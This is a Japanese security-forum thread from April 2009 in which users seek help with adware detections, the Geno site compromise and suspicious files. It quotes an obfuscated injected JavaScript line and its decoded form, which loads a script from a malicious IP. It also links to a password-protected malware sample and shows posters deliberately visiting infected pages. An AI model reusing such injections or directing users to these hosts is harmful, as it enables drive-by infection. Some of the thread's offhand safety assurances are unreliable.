こちらで質問するよう誘導されてきました。マルチではありません、よろしくお願いします。
【使用OS】 XP SP2
【Microsoft Update(MU)の状態】 有
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に更新しています
【スパイウェア対策ソフト】 スパイボット clam(非常駐)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に更新しています
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されたのはAdware memwatcherというものです
昨日インターネットを高速化しようと思い、InternetAcceleratorSPというフリーソフトをいれました。
するとウィルスバスター2009で検索したところ、スパイウェアは101個検出されました。
未解決の脅威の検出数101、処理数101です。
いつもは検出したらすぐ削除されるのですが、今回は全て隔離になっていました。
これは一体どうすればいいのでしょう?
最悪リカバリも覚悟していますが、InternetAcceleratorSPというフリーソフトというフリーソフト自体削除した方がいいのでしょうか?
窓の社などで紹介されていたので信用していたのですが・・
ちなみにもう一台のパソコンも検出数が全く同じ結果がでました。共通の行為としてはInternetAcceleratorSPというフリーソフトをいれたことだけです。
お分かりの方がいましたらどうか教えてください。お願いします。
あと全ての検出が終わった際、Adware memwatcherというものが1つ表示され削除か復元かを選ぶことになりました。
すぐに削除しましたが、これは解決したということなのでしょうか・・
666:名無しさん@お腹いっぱい。
09/04/05 16:19:58
Adware memwatcher
広告の出るソフト使ってるんじゃないか?
検出名どおり、広告表示のアドウエアだったと思うざます。
トレンドも一応表示してるだけじゃないかな
URLリンク(www.trendmicro.co.jp)
667:八頭 ◆YAGApwSaEw
09/04/05 16:27:18
>スパイウェアは101個検出されました
ダウンローダも同封されてたのかな?
668:665
09/04/05 16:32:31
>>666
もしかしたらそうかもしれません。ただ広告表示はこれまで出たことがないのでどういうものか分かりませんが・・
これから出るのでしょうか?できればあんまり関わりたくないです。
gooスピードテストなBNP スピードテストなど速度検索をするページへのリンクが機能の中にあるのでこれかもしれません。
製作者は安岡喜晴さんと明示してありますが、ホームページにハングルがあるので韓国製と考えたほうがいいかもしれません。
大陸のものはGOM PLAYERなど使っていたのであんまり抵抗がないかったのですが・・
気になっているのは隔離されました、と出るのに隔離ファイルに先ほど削除したものを除いて何も見当たらないことなんです
そういうものであれば別に問題ないのですが・・
ちなみに隔離ファイル名は全てC:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1です
669:名無しさん@お腹いっぱい。
09/04/05 16:35:05
マカの情報。幾分詳しいか。
URLリンク(www.mcafee.com)
670:665
09/04/05 16:35:19
>>667
作者サイトにてInternetAcceleratorSPSetup.msiとものを落としました。
速度測定サイトで紹介されていたので安心していましたが、これ自体がスパイウェアだったのでしょうか?
671:八頭 ◆YAGApwSaEw
09/04/05 16:41:00
恐いのはダウンローダ型が呼び寄せる多重感染だから
PCトラブル質問掲示板 へ相談して指示をもらうのがいいと思う
アメリカでもAdware memwatcherの感染例があった
672:名無しさん@お腹いっぱい。
09/04/05 16:49:19
アダ被で同質の感染例見つけたけど
バスタがきっちり処理してたらしい
まあ診てもらっても良いかも
673:665
09/04/05 17:08:45
>>672
アダ被で同質の感染例・・
悪夢です。ちなみにどこでしょうか?
自分でも探していますが、もし差し支えなければどこだか教えて下さい
674:名無しさん@お腹いっぱい。
09/04/05 17:33:42
いや、質問が似てるってだけで内容は違うよ?
マルチと言ってるわけではないので、その辺は誤解なきよう…
ただバスタがやたら
[マルウエア名称] C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1
で検知してると思ったから、同じかなあと思っただけで
さて、晒していいものなのか判らんが・・・・
675:674
09/04/05 17:34:38
ちなみに感染マルウエアは同じ。
676:665
09/04/05 17:40:46
>>669
URLリンク(www.mcafee.com)
ここを見たところ
「Adware-MemWatcherはバックグラウンドで起動し、ユーザがInternet Explorerを開くのを待ちます。ユーザがInternet Explorerを開くと、広告を表示するウインドウを1つ以上表示します。 」
とあります。
つまりInternet Explorerを開いて問題なければ大丈夫ということでしょうか?
677:665
09/04/05 18:01:10
>>674
すいません。一生懸命探したのですがどこだか分かりませんでした。
内容は記述なさらいで構いません。せめてURLだけでも教えて下さい。
お願いします。
678:名無しさん@お腹いっぱい。
09/04/05 18:15:01
URLリンク(www.higaitaisaku.com)
679:名無しさん@お腹いっぱい。
09/04/05 20:30:09
これ踏んでしまったのですが大丈夫でしょうか?
【注文0.1】Genoのサイトでウイルス感染…か?★2
スレリンク(news板)
680:名無しさん@お腹いっぱい。
09/04/05 20:40:14
ちょ、直貼りやめれ
681:名無しさん@お腹いっぱい。
09/04/05 20:42:16
t"s"ushima か。。。。
682:名無しさん@お腹いっぱい。
09/04/05 20:45:58
いや、別に問題ない
ニュー速板のリンク
683: ◆N9P3SuvBPo
09/04/05 21:36:19
>679
ざっと読んできたけど、2000とXPに限定されてるとあったからVistaなら大丈夫だとありましたね。
XPだとやられちゃうのか…よし踏んで来るか!!
684: ◆N9P3SuvBPo
09/04/05 21:46:55
今、その問題のサイトを表示してるんだけどなんにも起きません。
もしかして訂正された?
685:名無しさん@お腹いっぱい。
09/04/05 21:57:52
いや、まだだと思うけど・・・
情報交換は本スレでしたほうが良いかもね。
686:名無しさん@お腹いっぱい。
09/04/05 22:06:02
>>684
AcrobatとFlash Playerの古いバージョン入れてIEのセキュを中以下にして再トライきぼんw
687: ◆N9P3SuvBPo
09/04/05 22:08:16
俺今な、そのgenoのトップやiframeで読み込まれるアンケートページ
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ?
OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね?
誰でも良い、仮想PC持ってる人いたら検証してくれ!!
688: ◆N9P3SuvBPo
09/04/05 23:46:30
>>686
JavaScriptやActiveX無効にしてたのに、運悪く感染した人もいたそうで…
その人、俺と違って最低限WindowsのUpdateはしっかりとやってるだろうから、
この俺のパソコンよりセキュリティレベルは、比べ物にならないほど上だと思いますよ。
689:名無しさん@お腹いっぱい。
09/04/06 00:15:56
>>688
再トライきぼんwは戯言だけど…、
他人がどうのではなく、実験機XPのAcrobatとFlash Playerの有無と有の場合のVer、
ブラウザのセキュリティ設定も書きこんだ上で結果を発表しないと…ここはセキュ板だもん。
690:名無しさん@お腹いっぱい。
09/04/06 00:16:43
【使用OS】 Windows vista home
【Microsoft Update(MU)の状態】 有り
【使用セキュリティソフトとバージョン】 カスペルスキー7.0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 スパイボット ADware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ただいまスキャン中なのでスキャンの結果ではないのですが、あるHPに行こうとしたら
「脅威を検知しました」が出ました。
警告により拒否はしたのでレポート上では"安全になったオブジェクト"になっています。
検知したものは「trojan-Downloader.JS.Agent.dwf」 URLは t t p : / / 94.247.2.195/jquery.js
経緯としては、研音(芸能事務所)のK-shopというグッズ販売の水嶋ヒロさんのページのところから
菅野美穂さんがキイナで使ったネックレスというjuicyrockのバナーをクリックしたら検知が出ました。
誤検知なのか本当にトロイなのかわからないのですがいかがでしょうか。
URLリンク(www.ken-on.co.jp)
K-shopのトップページにも同じバナーはあります。
691:名無しさん@お腹いっぱい。
09/04/06 00:18:51
上の方で話題になってるGenoだね
692: ◆N9P3SuvBPo
09/04/06 00:19:21
>689
Acrobatなし
Flashあり(最新版)
ブラウザIE(セキュリティ高)
アドオン無効
制限付きユーザー
693: ◆N9P3SuvBPo
09/04/06 00:25:06
>690
問題になってるgenoウイルスだね。
とりあえずカスペなら対応済みのようなので、念の為スキャンしてみましょう。
694:名無しさん@お腹いっぱい。
09/04/06 00:34:32
>>690です。レスありがとうございます。
このページで買い物するつもりはないのですが残念な目にあってしまいましたorz
拒否が有効でなにも検出されなければ、他の安全なサイトでのショッピングなどは問題ないでしょうか。
たまに買い物はするので…。あと70%ほどのスキャンが終わったらまた参ります。
695: ◆N9P3SuvBPo
09/04/06 00:56:59
>694
WindowsUpdateとAcrobatとFlashが最新版なら大丈夫。
それでも心配ならリカバリするのが最も良い対策と言えるでしょう。
696:名無しさん@お腹いっぱい。
09/04/06 01:12:33
>>695 JavaスクリプトONにしてアボート、94.247.2.195と通信していたら時既に手遅れ
697:名無しさん@お腹いっぱい。
09/04/06 01:23:34
>>690です。
>>695
スキャン終わりました。検出なしです。
>>696
すいませんがそこと通信しているかどうか確かめる方法はありますか?
698: ◆N9P3SuvBPo
09/04/06 01:24:10
>696
リアルタイムで検知して拒否したので、94.247.2.195とは通信してないと思われます。
94.247.2.195も踏んで来たけど、『Search the Web:』ってもしかしてCoolWebSearchなのか?
699: ◆N9P3SuvBPo
09/04/06 01:27:59
>697
検出なし、了解です。
通信なら、スタート→検索欄に「cmd.exe」と入力してEnter
コマンドプロンプトの画面で、「netstat -an」と入力してEnter
94.247.2.195と通信してればアウト
たぶん大丈夫だと思いますが…。
700:名無しさん@お腹いっぱい。
09/04/06 01:33:26
>>696
690のケースはカスペで検知(遮断)されている前提
701:名無しさん@お腹いっぱい。
09/04/06 01:44:07
>>690です。アドバイス感謝いたします。
コマンドプロンプトにて「netstat -an」を実行しました。
94.247.2.195との通信履歴はありませんでした。実行すると"アクティブな接続"と表示されますが、
すでになんらかの通信が終わった後だったため(0時36分の出来事だったため)
に通信が表示されなかったということもあり得るのでしょうか。
考えなくてよいのならば、その後の詳細の発表を待ちたいと思います。
702: ◆N9P3SuvBPo
09/04/06 01:53:47
>701
じゃあ、今はとりあえず様子見…後日KVRTを使ってチェックしてみるとか。
ちなみに、タスクマネージャにconime.exeがあったらアウトってレスがあると思いますが、
コマンドプロンプトを起動させれば、自動的にconime.exeも起動するようになってますので。
またコマンドプロンプトを閉じても、conime.exeが残るのは使用ですから。
703:名無しさん@お腹いっぱい。
09/04/06 02:12:59
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く~…有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
ソフトに関係するレジストリも削除済みです。
何か、ウィルスやその他の脅威の可能性はありますでしょうか?
704:名無しさん@お腹いっぱい。
09/04/06 06:30:51
951 名前:名無しさん[sage] 投稿日:2009/04/06(月) 01:34:39 0
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く~?有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
関係するレジストリも削除済みです。
この項目が出ないようにする方法知ってる方いたら、教えて下さい。
何回やっても出てきて気持ち悪くて。。
705:名無しさん@お腹いっぱい。
09/04/06 21:07:46
Vista 一般ユーザー(管理者権限は持ってない)
IE7 保護モード
これでだいたいの奴は踏んでも怖くない
706:名無しさん@お腹いっぱい。
09/04/06 21:44:04
Windows Updateとウィルス定義を最新にしとけば大丈夫なんじゃないの?
「ウイルス対策ソフトのパターンファイルが最新であったにもかかわらず,
職員のWeb閲覧でPE_MUMAWOW.AJ-Oに感染,システムが
利用不能に。Windows Update+ウイルス対策ソフトでは対策にならない例。」
どうして対策できなかったの?
707:名無しさん@お腹いっぱい。
09/04/06 23:50:31
>>706
>Windows Update
Windows の脆弱性をつく攻撃ではなかった
もしくは
ゼロデイ攻撃が行われており、まだパッチがなかった
>ウイルス対策ソフト
ウイルス対策ソフトがまだ対応していないウイルスだった
708:名無しさん@お腹いっぱい。
09/04/07 00:33:08
教えてください。
avastをインスコ バージョン4.8.1335.0
手動でUPDATEして
VPSの現在のバージョン 090406-0、04/06
この状態でスキャン完了。50分くらいかかったが何も検出されず
これで一応は GENOウィルス大丈夫ってことで良いのでしょうか????????
【使用OS】 「windows xp sp3」
【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
【使用セキュリティソフトとバージョン】 「zone alarm」 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「したつもり」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「あり」
【スキャンの結果】 「何も検出されず」」
これからMicrosoft Update試みてみます。
709:名無しさん@お腹いっぱい。
09/04/07 00:45:37
0-day攻撃でやられた、もしくはパッチ未適用でやられた場合でも大丈夫なように、
Vista+IE7で、保護モード使ってるな
710: ◆N9P3SuvBPo
09/04/07 00:50:26
>708
GENOウイルス関連サイト踏んだの?
geno-webに飛ばす短縮URLを間違えてクリックしてしまったとか?
711:名無しさん@お腹いっぱい。
09/04/07 01:02:03
>>710
はい、SDカード欲しくて、色んなサイト物色してたもんで
思いっきりGENO本体見てましたorz....
何時見たのかが記憶にないので
色々不安になってしまいまして
検出されなけれ大丈夫ですよねぇ??
712:名無しさん@お腹いっぱい。
09/04/07 01:04:33
ひとつ気になるのはこれを踏んだあとか前かはわからんがアマゾンでクレカ決済しているんだよなあ・・・
httpsって飾りですかね。
713: ◆N9P3SuvBPo
09/04/07 01:11:10
>711
そういう時は履歴を見れば良いんですよ。
該当するサイト名を右クリック→プロパティ
最終表示日時を見れば、いつ踏んだか分かりますので。
いや、あなた質問する時にこう言いましたよね?
>【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
って
何度試しても時間を置いて試してもそれでも繋がらない、となると可能性はあります。
MicrosoftUpdateできました?
714:名無しさん@お腹いっぱい。
09/04/07 01:24:14
>>713
firefoxで見てたんですが
なんか調子悪いんで真っ先にアンインストールしてしまってて・・・・
履歴って残ってるもんなんでしょうか???
マジMicrosoft Updateが繋がりませんしたorz
なんかもう疲れたんでorz
当該PCは電源落として明日また挑戦してみます
715:名無しさん@お腹いっぱい。
09/04/07 01:27:51
>>714
UpdateはIEでやるべきじゃね?
716: ◆N9P3SuvBPo
09/04/07 01:29:39
>714
俺Firefox使ってないから断定はできないけど、消えちゃうんじゃないでしょうか…。
電源落す前に、HijackThisのログをどこかのうpろだへ“パス付きで”上げて貰えないでしょうか?
717:八頭 ◆YAGApwSaEw
09/04/07 01:54:45
>>708と◆N9P3SuvBPo
・Winコントロールパネル>管理ツール>サービス
>「Avast関連のサービス」と「Automatic Updates」がちゃんと動いてるかを確認(駆除後も確認必要)
・Winコントロールパネル>セキュリティセンターの「自動更新」も確認(駆除後も確認必要)
Genoのウイルスはコレ
URLリンク(www.virustotal.com)
File 8lv.exe received on 04.03.2009 18:36:21 (CET)
Avast ・・・ Win32:Daonol-L
「a-squared Free 4.0」 をダウンロード
URLリンク(www.emsisoft.jp)
>手動Updateする
>「ディープスキャン」を選択実行して検出を試みる、
(※スキャン終了後に「ログ保存」にボタンをクリックして都合のいい場所にテキスト保存、
あとでAvastへ提出しておく)>a-squared Freeでそのまま駆除
718:八頭 ◆YAGApwSaEw
09/04/07 02:05:51
複数仕掛けられてた模様・・・
このサイト踏みたくなかったんで、Symantecへは別件提出しといたから対応してくれたんだろう
GENOなどのサイトでウイルス感染★6
GmL.exe 受理 2009.04.06 18:04:43 (CET)
URLリンク(www.virustotal.com)
La.zip 受理 2009.04.06 18:32:46 (CET)
URLリンク(www.virustotal.com)
パックされたDropper型、McAfeeやSymantecは対応済みらしい
719: ◆N9P3SuvBPo
09/04/07 02:15:15
>717
俺、Avast入れてないし、自動更新だって無効に設定してますけど?
電源落すって言ってたけど、環境によってはブルスクになるってあったからな…
720:八頭 ◆YAGApwSaEw
09/04/07 02:22:59
KillAVだからね・・・(セキュリティソフトやMicrosoft Updateを停める)
a-squaredよりもこっちのほうが良かったかな?
マカフィー・インターネットセキュリティ 2009体験版
URLリンク(www.storemcafee.jp)
Avastと一時的な共存なら問題無いから(駆除後にマカフィーアンインストール)体験版使う方がいいかもね
検出箇所と検出名は◆N9P3SuvBPoに教えてあげてねw
721:名無しさん@お腹いっぱい。
09/04/07 02:30:47
>>720
すんません詳しくありがとうございまする
色々慣れないもので・・・・
流れとしては
PCが重くなる→AVG(前から入ってたが自動UPDATE不能に)→たまたまGENOウイルスの存在を知る
怖くなってAVG削除→avastは対応してる?らしいのでインスコ→これも自動UPDATEできず・・・→手動で>>708の状態まで辿り着く
あれ?Microsoft Updateできないや・・・・・→また不安にorz
明日マカフィー入れてスキャンしてみます。
ありがとうございました。
722: ◆N9P3SuvBPo
09/04/07 02:39:24
>721
自動更新やBITSが有効でもね、書き換えられていたらENDだよ。
HijackThisすらもDLできないのか…となると残る選択肢はリカバリしか…
723:名無しさん@お腹いっぱい。
09/04/07 03:51:53
>>721
自動UPDATEできないのならアウトだと思う
724:名無しさん@お腹いっぱい。
09/04/07 14:08:00
【使用OS】 「windows xp sp3」
【使用セキュリティソフトとバージョン】 「ノートン2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「年明けで期限切れ」
スキャンで反応が無かったので開こうと思ったらexe・・・
exeのあるフォルダにexeと同じ名前のフォルダを作ってましたが、
他にどんな動作をしているものなのでしょうか?
*ウイルス注意*
URLリンク(www1.axfc.net) pass[2ch]
725:名無しさん@お腹いっぱい。
09/04/07 15:08:25
>>724
おもいっきりクロだった。あとは自分で調べれ
File: exe.exe
Status:
INFECTED/MALWARE
MD5: 6da1bd47cfcdb0de1804ba3d193bdee1
Packers detected:
-
↓各スキャナの結果。未検出だったとこは割愛
Scan taken on 07 Apr 2009 05:45:28 (GMT)
AntiVir
Found TR/Dropper.Gen
Avast
Found Win32:SdBot-gen44
CPsecure
Found Troj.Exploit.W32.IMG-WMF.da
Ikarus
Found Virus.Win32.SdBot.gen44
Sophos Antivirus
Found Mal/Behav-043
よくわからんけど他の不正プログラムを落とすマルウェアみたい
726:名無しさん@お腹いっぱい。
09/04/07 22:18:45
【使用OS】 「Windows 2000」
【Microsoft Update(MU)の状態】 「SP4適用のみ」
【使用セキュリティソフトとバージョン】 「Avira」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「a-squared Free 4.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Aviraとa-squared Free 4.0でスキャンしたが何も検出されない」
GENOのサイトへアクセスしたとき、いつもよりページが開くのが遅く、重かったので直ぐに他のページを
開きました。時間を空けてGENOに再びアクセスしたところ、よく覚えていないのですがメッセージの画面が
出て内容も全部読まずに「はい」をクリックしました。
アドビ関係は偶然にも3月の17日に最新版をダウンロードしてインストールしています。
いろんなページに書き込まれていて怖くなりどうすればいいのかわかりません。
727:726
09/04/07 22:32:25
ブラウザはファイアフォックスで再起動してみましたが、何ともありませんでした。
728:名無しさん@お腹いっぱい。
09/04/07 22:55:00
【使用OS】 「windows xp sp3」
【使用セキュリティソフトとバージョン】「AVG」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
AVGでは何も検出され
F-Secureでオンラインスキャナしたら
W32/Packed_RPack.Fってのが検出されたんだけど
ググッても情報が何も出てこないんですけど
どなたか情報をください。
729: ◆N9P3SuvBPo
09/04/07 22:58:24
>727
最新版のadobe製品を適用済みとのことなので、そこは大丈夫だと思います。
しかし、メッセージに対して「はい」をクリックしたのは少しひっかかりますけど…
730: ◆N9P3SuvBPo
09/04/07 23:03:49
>728
たしかに情報ありませんね。
名前削ったりしてもヒットせず。
検出場所分かります?
あと、もしかしてGENOを踏んでしまったとか?
731:名無しさん@お腹いっぱい。
09/04/07 23:08:07
>>729
ありがとうございます
メッセージは日本語でバックがグレーでした
飛ばし読みですが意味は新しいバージョンがどうのこうのとかいう内容だった
ような気がします。
プロセスエクスプローラなどでも確認しましたが、怪しいものはありませんでした。
ブラウザでアクセスしたときに左下のURLを確認していましたが、見慣れない
アドレスが出ていましたが、飛ばされることはありませんでした。
このまま様子見で大丈夫でしょうか
732:名無しさん@お腹いっぱい。
09/04/07 23:11:36
>730
URLリンク(lapcie.com)
ここのサイトのAsukaTime
Ver 1.0.28 Download
ってやつのexeから検出されたんですけど
わかりますかね?
733:名無しさん@お腹いっぱい。
09/04/07 23:17:34
【使用OS】 「Windows XP Pro」
【Microsoft Update(MU)の状態】 「自動 下記が未インストール」
Windows Genuine Advantage (正規 Windows 推奨プログラム) 通知ツール (KB905474)
Microsoft .NET Framework 3.5 Service Pack 1 および .NET Framework 3.5 ファミリ更新プログラム (KB951847) x86
【使用セキュリティソフトとバージョン】 「ウィルスバスター 2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001a
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「BBルータ有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_GENOME.BK popup[1].js」
geno騒ぎを聞いたのでチェックしたところ上記がでてきました。
ちなみにIEの履歴には 94.***.***.*** は無し
下記のアクセス履歴が残ってました。
URLリンク(www.geno-web.jp)
最終表示日時 2009/03/31
ウイルスに感染していますか? acrobatreadは8.1.2なので古いです。
734:733
09/04/07 23:21:17
パターンファイル部書き忘れました
よろしくお願いします。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001
パターンファイル番号 5.949.00
735: ◆N9P3SuvBPo
09/04/07 23:23:53
>731
>日本語でグレー
>新しいバージョン
これってもしや、AcrobatもしくはFlashのアップデート通知?
でもAdobe製品が最新ならそんなメッセージが出ないのが普通なんですが…
念の為、HijackThisというツールを落してきて、ログを取って、適当なアップローダーに、
“パス付きで”アップしてれませんか。
HijackThisのダウンロード
↓
URLリンク(wiki.higaitaisaku.com)
>732
AsukaTime.exeか…
いちおうそのファイルを、VirusTotalでスキャンして、
結果のURLを貼ってくれませんか。
736: ◆N9P3SuvBPo
09/04/07 23:29:15
>733
先に聞きますが、SP2かSP3は当ててますよね?
>最終表示日時 2009/03/31
GENOが問題のサイトになってると報告されたのが、4月4日らしいので、
その日以前にアクセスしたということだったら、たぶん大丈夫でしょう。
IEのキャッシュのクリアとクッキーのクリアを行なってください。
737:733
09/04/07 23:31:22
>>736
WinXP Pro SP3です
キャッシュのクリアとクッキーのクリアを行います。
念のため、いくつかのオンラインウィルススキャンをやってみます。
ありがとうございました。
738:名無しさん@お腹いっぱい。
09/04/07 23:31:55
>735
検索してみました~これでおkですかね?
URLリンク(www.virustotal.com)
739: ◆N9P3SuvBPo
09/04/07 23:39:52
>737
了解です。
>738
うはwwwwwwwwウイルス名から推測するにかなり厄介なタイプと見た。
有名な所もふくめていくつかのベンダーも検知してるので、誤検出の可能性は低いと見た。
素性が全くわからない相手なので(もし分かってたとしても駆除は難しいと思う)、
リカバリをお奨めします。
740:名無しさん@お腹いっぱい。
09/04/07 23:43:14
>739
わかりました~
ありがとうございました~
741:733
09/04/07 23:49:33
>>736
便利そうなものなので こちら(popup.js)もアップしました。
どうも誤検知っぽいですね。
URLリンク(www.virustotal.com)
742: ◆N9P3SuvBPo
09/04/07 23:53:51
>741
はい、こちらは誤検出です。
トレンドが「誤検出だ」と訂正してました。
743:名無しさん@お腹いっぱい。
09/04/07 23:55:58
>>741
パターンファイルは最新っぽいから
訂正し切れなかったものかと思われます。
744:名無しさん@お腹いっぱい。
09/04/08 00:10:16
test
745: ◆N9P3SuvBPo
09/04/08 00:14:42
あと1時間起きていられるか分かりません…
746:名無しさん@お腹いっぱい。
09/04/08 00:24:44
>>732
AsukaTime.exe 動かしたが何も落ちてこない。ツマンネ
Bit の Peed.Gen の説明見たが、該当箇所のレジストリも改変されてないし、
ファイルのコピーもできてない。モットツマンネ
URLリンク(www.threatexpert.com)
747:名無しさん@お腹いっぱい。
09/04/08 00:26:24
>>739
URLリンク(www.virustotal.com)
アンパックしたら減った。パッカで検出してんじゃね?
748: ◆N9P3SuvBPo
09/04/08 00:36:56
>747
そうだろうか?
もし、>>738の結果が誤検出なら多過ぎだと思うんですがね…
749:名無しさん@お腹いっぱい。
09/04/08 00:56:24
>>738 >>747 の差分
パッカー(6)とヒューリスティック(4)と Peed.Gen(2)
Peed.Genは改変、ドロップなし報告あり。
AhnLab-V3 5.0.0.2 2009.04.07 Win32/MalPackedB.suspicious
Authentium 5.1.2.4 2009.04.07 W32/Heuristic-210!Eldorado
BitDefender 7.2 2009.04.07 Trojan.Peed.Gen
F-Prot 4.4.4.56 2009.04.07 W32/Heuristic-210!Eldorado
GData 19 2009.04.07 Trojan.Peed.Gen
Norman 6.00.06 2009.04.07 W32/Packed_RLPack.F
Panda 10.0.0.14 2009.04.06 Malicious Packer
Prevx1 V2 2009.04.07 High Risk Cloaked Malware
Sophos 4.40.0 2009.04.07 Sus/ComPack-F
Sunbelt 3.2.1858.2 2009.04.06 Trojan.Win32.Packer.RLPack1.18.a (v)
Symantec 1.4.4.12 2009.04.07 Suspicious.MH690.A
VirusBuster 4.6.5.0 2009.04.06 Packed/RLPack
まぁ、心配なら使わないことだな。
750: ◆N9P3SuvBPo
09/04/08 01:04:55
今日のところはこれで失礼させてもらいますね。
751:名無しさん@お腹いっぱい。
09/04/08 02:16:50
>>746
>>747
>>748
>>749
ご丁寧にいろいろとありがとうございました。
パッカで検出をしていました
お手数おかけしてすいませんでした~
752:名無しさん@お腹いっぱい。
09/04/08 02:45:10
778 名前: アブラチャン(アラバマ州)[sage] 投稿日:2009/04/08(水) 01:20:59.53 ID:cD+rmH6W
ここもか?
www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
↓
<script src=//94.247.2.195/jquery.js></script>
753:名無しさん@お腹いっぱい。
09/04/08 02:51:53
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「avast!4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
タスクバーを見たところ、「wpsupdate.exe」とあり、
最大化してみるとはいといいえのボタンだけで、いいえを押すと消えました
再起動して、タスクバーをみるとやはりありました
当然知らなくて検索してみるとどうやらスパイウェアらしいのです。
怖くなってspybotでスキャンしてみても検出されませんでした
どうすれば良いのでしょうか?
754:名無しさん@お腹いっぱい。
09/04/08 09:05:52
ウィルスドロッパーか
初めてお目にかかった サンキュー
755:名無しさん@お腹いっぱい。
09/04/08 10:29:36
>>725
ありがとうございます。
久しぶりにクリーンすっかな・・・
756:名無しさん@お腹いっぱい。
09/04/08 13:03:51
>>735
Adobe Reader 9 のバージョンは 9.0.0.332 でした。
ログは
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:25:24, on 2009/04/08
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\soft\HiJackThis.exe
757:756
09/04/08 13:05:30
>>735
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [Persistence] C:\WINNT\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\.DEFAULT\..\Run: [Internat.exe] Internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
758:756
09/04/08 13:08:09
>>735
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
